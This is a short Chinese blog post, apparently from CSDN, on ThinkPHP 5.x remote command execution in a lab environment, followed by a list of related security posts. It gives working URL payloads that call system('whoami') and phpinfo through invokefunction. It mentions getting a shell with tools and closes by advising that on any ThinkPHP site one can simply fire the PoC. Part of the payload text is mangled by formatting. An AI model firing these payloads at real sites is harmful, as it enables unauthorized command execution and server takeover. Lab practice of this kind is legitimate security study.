常见框架漏洞(Thinkphp)

Thinkphp5x远程命令执行及getshell

开启环境,访问靶场


可以用工具进行检测是否存在漏洞

存在漏洞可以直接用工具get shell

也可以手工操作

远程代码执行whoami
POC:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/3f9cea23ca9c4ceda547abd9ef7acffd.png) ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 Thinkphp被曝很多漏洞,截至目前位置3x -- 6x的各个版本都被爆有大量漏洞,遇到TP的 站,直接打poc就可以了

相关推荐
黑客老李2 小时前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
玥轩_5212 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
薄荷椰果抹茶3 小时前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全
weixin_472339463 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li3 小时前
WebView安全实现(一)
android·安全·webview
咖啡啡不加糖3 小时前
暴力破解漏洞与命令执行漏洞
java·后端·web安全
weixin_472339463 小时前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
码农12138号9 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
诗句藏于尽头11 小时前
完成ssl不安全警告
网络协议·安全·ssl
独行soc16 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试